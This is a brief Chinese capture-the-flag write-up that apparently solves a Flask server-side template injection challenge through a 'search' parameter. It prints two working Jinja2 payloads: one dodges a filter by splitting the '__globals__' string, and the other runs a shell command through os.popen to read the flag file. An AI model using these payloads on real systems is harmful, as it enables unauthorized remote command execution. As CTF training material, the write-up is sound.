题目告诉我们了,是flask
在页面源代码发现
告诉了GET传参search
看看有没有SSTI
看一下全局变量
{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']}}
发现'OSError': <type 'exceptions.OSError'>
,说明<class 'warnings.catch_warnings'>
没有加载OS模块,所以在执行命令的时候需要自己加载OS模块。
flag不在根目录,需要自己找
{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('cat /flasklight/coomme_geeeett_youur_flek').read()}}